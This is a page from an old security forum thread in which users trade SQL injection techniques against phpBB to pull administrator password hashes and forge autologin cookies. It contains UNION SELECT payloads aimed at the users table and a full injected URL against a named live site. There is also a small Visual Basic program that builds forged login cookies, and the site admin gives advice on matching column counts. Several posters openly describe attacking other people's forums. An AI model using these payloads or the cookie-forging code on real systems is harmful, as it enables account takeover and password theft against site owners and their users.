 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
yes |
 |
 Posted: Sat Jul 24, 2004 1:29 am |
 |
|
| l3az3ouze |
| Beginner |
 |
|
| Joined: Jul 23, 2004 |
| Posts: 2 |
|
|
|
 |
|
 |
|
i used to try this SQL vuln, in many phpbb websites, but i found that when i'm usin a normal user md5 it works 100%, but when i'm using an Admin md5 pass in the cookies, it doesn't log me in!!!!!
maybe there is a second username or password, isn't it? |
|
|
|
|
|
|
|
|
| Posted: Sat Jul 24, 2004 9:25 am |
|
|
| zer0-c00l |
| Advanced user |
 |
|
| Joined: Jun 25, 2004 |
| Posts: 72 |
| Location: BRAZIL! |
|
|
|
|
|
|
| Code: | Could not query private message post information
DEBUG MODE
SQL Error : 1222 The used SELECT statements have a different number of columns
SELECT u.username AS username_1, u.user_id AS user_id_1, u2.username AS username_2, u2.user_id AS user_id_2, u.user_sig_bbcode_uid, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_icq, u.user_aim, u.user_yim, u.user_regdate, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_avatar, pm.*, pmt.privmsgs_bbcode_uid, pmt.privmsgs_text FROM phpbb_privmsgs pm, phpbb_privmsgs_text pmt, phpbb_users u, phpbb_users u2 WHERE pm.privmsgs_id = 99 AND pmt.privmsgs_text_id = pm.privmsgs_id AND pm.privmsgs_type=-99 UNION SELECT username,null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,user_password FROM phpbb_users WHERE user_level=1 LIMIT 1/*AND ( ( pm.privmsgs_to_userid = 272 AND pm.privmsgs_type = 3 ) OR ( pm.privmsgs_from_userid = 272 AND pm.privmsgs_type = 4 ) ) AND u.user_id = pm.privmsgs_from_userid AND u2.user_id = pm.privmsgs_to_userid
Line : 247
File : /home/********/public_html/forum/privmsg.php
|
???? |
|
|
|
|
|
|
|
|
| Posted: Sun Jul 25, 2004 12:23 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| Seems like modified sql query. Try to add "null"-s one-by-one, till you stop have getting error message "different count of columns". |
|
|
|
|
| Posted: Sun Sep 12, 2004 3:12 pm |
|
|
| dj_wolf |
| Beginner |
|
|
| Joined: Sep 05, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
what mean this word in text and how can get uidsize :
Dim uidsize As String
Dim uid As String
Dim md5hash As String
Private Sub Command1_Click()
uid = Text1.Text
uidsize = Len(uid)
md5hash = Text2.Text
Text3.Text = "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22" + md5hash + "%22%3Bs%3A6%3A%22userid%22%3Bs%3A" + uidsize + "%3A%22" + uid + "%22%3B%7D"
End Sub |
|
|
|
|
| Posted: Mon Sep 13, 2004 4:20 am |
|
|
| morrowasted |
| Regular user |
|
|
| Joined: Sep 06, 2004 |
| Posts: 10 |
|
|
|
|
|
|
|
| Can this exploit also be used for XMB? |
|
_________________
I'm new to all this, sorry for my dumbness. |
|
|
|
|
|
|
|
| Posted: Mon Sep 13, 2004 7:49 pm |
|
|
| dj_wolf |
| Beginner |
|
|
| Joined: Sep 05, 2004 |
| Posts: 2 |
|
|
|
|
|
|
|
HI I DONT GET admin's md5 hasH PLZ HELP I USE THIS LINK BUT I DONT
I USE THIS LINK FOR SITE XXX AND GET ME THE TXT BUT I CANT REALEAS THE MD5 HASH BECAUSE EACH TIME GET ME THE OTHER MD5 HASH:
http://www.funiran.com/farsi-forum/search.php?search_id=1%20union%20select%%2020concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11<br%20/>%205,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11<br%20/>%201,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,<br%20/>%2059,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115<br%20/>%20,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5<br%20/>%208,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59<br%20/>%20,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9<br%20/>7,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[uid
RESULT:
SQL Error : 1064 You have an error in your SQL syntax near 'union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99' at line 3
SELECT search_array FROM phpbb_forumsearch_results WHERE search_id = 1 union select% 20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,11
5,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,11
1,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,
59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115
,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,5
8,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59
,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,9
7,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=[uid AND session_id = 'd5c932ff29bdc9cc2d018c811d494043' |
|
|
|
|
|
|
|
|
| Posted: Fri Oct 29, 2004 6:07 pm |
|
|
| zyon |
| Beginner |
|
|
| Joined: Oct 28, 2004 |
| Posts: 1 |
|
|
|
|
|
|
|
hi.
i hope i won't ask too much if i ask for more hints here.
how to provoke these various mysql error messages?
i really need help on this. 
| waraxe wrote: | Well, you have sql injection case allready, if you see that error message. So try now to provoke various mysql error messages, and maybe one of them will reveal real table name...
| kranium wrote: | well thx for your help, u rule
but one little question. I was trying using your knowledge but I've got this error:
| Quote: | | SQL Error : 1146 Table 'lusodemo.phpbb_users' doesn't exist |
so it sems that this guys have some kind of prefix in their tables, and i can't figure it out
so, i ask if there's any way i can get the correct table (or the table list) of this forum, maybe using a SHOW TABLES (i tried it without success)...
if you can help with some magic query i'll be very gratefull 
sorry my bad english and keep your excelent work |
|
|
|
|
|
|
|
Mozilla doesn't accept edited cookies |
|
| Posted: Thu Nov 11, 2004 9:08 am |
|
|
| Dieselboy |
| Beginner |
|
|
| Joined: Nov 11, 2004 |
| Posts: 1 |
|
|
|
|
|
|
|
|
Last edited by Dieselboy on Wed Jul 20, 2005 3:35 pm; edited 1 time in total
_________________
You will respect my authority! |
|
|
|
| Posted: Fri Apr 01, 2005 8:47 pm |
|
|
| TheRipper |
| Regular user |
 |
|
| Joined: Mar 25, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
does it works with phpbb 2.0.13 ??  |
|
|
|
|
| Posted: Sat Apr 02, 2005 1:32 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Have not tested, but it will work, uneless phpbb developers are not taken some countermeasures  |
|
|
|
|
| Posted: Sat Apr 02, 2005 12:17 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| TheRipper wrote: | | does it works with phpbb 2.0.13 ?? |
if u can steal the admin ids |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
| Posted: Mon Apr 11, 2005 3:48 pm |
|
|
| TheRipper |
| Regular user |
|
|
| Joined: Mar 25, 2005 |
| Posts: 6 |
|
|
|
|
|
|
|
i have both  (taken from an old database) but i don't know if the passw it's still the same  |
|
|
|
|
| Posted: Tue Apr 12, 2005 8:55 am |
|
|
| shai-tan |
| Valuable expert |
|
|
| Joined: Feb 22, 2005 |
| Posts: 477 |
|
|
|
|
|
|
|
So wait a minute... Did someone just stumble across a 2.0.13 exploit or is it yet another false alarm?  |
|
_________________
Shai-tan
?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds |
|
|
|
| Posted: Fri Apr 29, 2005 1:56 am |
|
|
| w00t |
| Beginner |
|
|
| Joined: Apr 29, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
Hey,
Ive been interested in this for a while, but its never worked for me. I can gain the hashes, edit all required information, but it just never logs me in, i always log in to my account.
Im thinking this may be because of updated version(s) or firefox (im running 2.0.3). Is there any browsers anyone can reccomend? |
|
|
|
|
| Posted: Fri May 20, 2005 8:20 am |
|
|
| Twinky |
| Regular user |
|
|
| Joined: May 20, 2005 |
| Posts: 5 |
|
|
|
|
|
|
|
| i try this... but the md5 hashhes doesnt display in the url |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 3 of 5
Goto page Previous1, 2, 3, 4, 5Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 96
Members: 0
Total: 96
